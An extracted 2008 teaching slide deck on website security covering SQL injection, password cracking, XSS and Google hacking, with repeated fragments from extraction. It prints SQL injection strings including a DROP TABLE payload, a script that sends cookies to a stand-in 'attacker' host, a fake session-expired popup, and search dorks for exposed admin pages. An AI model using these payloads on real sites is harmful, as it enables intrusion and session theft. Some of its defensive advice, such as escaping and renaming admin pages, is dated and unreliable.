Website Security

Project

Some Techniques What Could Be Some Techniques What Could Be

Danger of Your Website

by

Bence Liska

2008-12-01

Website Security

We have to protect:

• Users’ information

(credit card, passwords, profiles, etc…)

• Users’ cookies and sessions• Users’ cookies and sessions

• The administration web forms

• Costumer information

• The content of the website

• The database of the website

Attack Types (Overviews)

Some techniques:

• SQL Injection

• Password Cracking

• Cross Site Scripting (XSS)• Cross Site Scripting (XSS)

• Google Hacking

• Etc…

SQL Injection (1)

• Entering SQL code into web forms, or into the

browser address field.

• You can get access to the website or the

database behind the site.

or

SQL Injection (2)

Example 1:

• At the Server:„SELECT * FROM users WHERE username = ‘” +$USRTEXT + „’ AND password = ‘” + $PASSTEXT + ”’;”$USRTEXT + „’ AND password = ‘” + $PASSTEXT + ”’;”

• SQL Injections:• ’ OR 1=1; --

• admin’; --

• ’) or (‘a’=’a

• ”) or (“a”=”a

• hi” or “a”=”a

Result:

„SELECT * FROM users WHERE username =

‘admin’; --’ AND password = ‘’;”

SQL Injection (3)

Example 2:

• At the Server:

„SELECT * FROM DATA WHERE id=” + $ID + ”;”

• SQL Injection:• 1;DROP TABLE users

• Result:

“SELECT * FROM DATA WHERE id=1;DROP TABLE users;”

SQL Injection (4)

• Preventing - Using Escaping

It is usual to escape parameters using the function

mysql_real_escape_string before sending the SQL query in PHP.

$query = sprintf("SELECT * FROM Users where

UserName ='%s' and Password='%s'",

mysql_real_escape_string($Username),

mysql_real_escape_string($Password));

mysql_query($query);

Password Cracking (1)

• Dictionary attack

Users often choose weak passwords. The

directory has a list of single words.

• Brute force attack• Brute force attack

This attack tries every possible password to

get access to the user account on the website.

(It is to slow.)

Password Cracking (2)

• Precomputation (Rainbow table)• Most website encrypts the user’s password (and name)

as a hash code. If we has a hash we can find the

plaintext by rainbow tables.

• Rainbow table: storing the (plaintext, ciphertext) pairs.• Rainbow table: storing the (plaintext, ciphertext) pairs.

• Preventing• Attackers must not get access even to the encrypted

password.

• The users have to use only strong passwords.

Cross Site Scripting (XSS)

• Typically found in web applications which

allow code injection by malicious web users

into the web pages viewed by other users.

1. „log” code

Attacker

User

Attacker’s web server

Website

1. „log” code

2. javascript code

3. login

4. send cookie

5. read the log

Example 1:

Other Cookie Theft Javascript:

<script>new Image().src="http://attacker/log.php?c="+encodeURI(document.cookie);</script>

Example 2:

Example 3:

<SCRIPT>var oF = window.open("","","width=275,

height=175, top=200, left=250 location=no, menubar=no, status=no, toolbar=no, scrollbars=no, resizable=no");

// HTML FORM with POST requestoF.document.write("Your session has expired"...);

</SCRIPT>

Google Hacking (1)

• Using Google (or other search engines),

"search engine hackers" can easily find

exploitable targets and sensitive data.

• Example 1:

Wordpress suffers from a possible XSS attacks.

Find Wordpress Login forms

intitle:"WordPress > * > Login form"

inurl:"wp-login.php"

Google Hacking (2)

• Example 2:

Phpinfo outputs lots of PHP information.<?php

// Show all information, defaults to INFO_ALL

phpinfo();

Find Phpinfo pages

intitle:phpinfo "PHP Version"

phpinfo();

// Show just the module information.

// phpinfo(8) yields identical results.

phpinfo(INFO_MODULES);

?>

Google Hacking (3)

• Example 3:

PhpMyAdmin is a Web UI for managing mySQL

databases.

Find PhpMyAdmin pages

inurl:main.php Welcome to phpMyAdmin

A Few Defensive Measures

• If you use CMS or other publishing platform or

framework you have to update to new versions as

soon as possible.

• If you have an admin page at your website do not call

“admin.php” or “AdminLogin.php” let’s rename it.

Call it for example “dog.php” or “hamburger.php”.

• Try to enter some confusing data into your login

fields like the sample Injection strings, and any else

which you think might confuse the server.

• Do a few Google hacks on your name and your

website. Just in case…

Thank you!Thank you!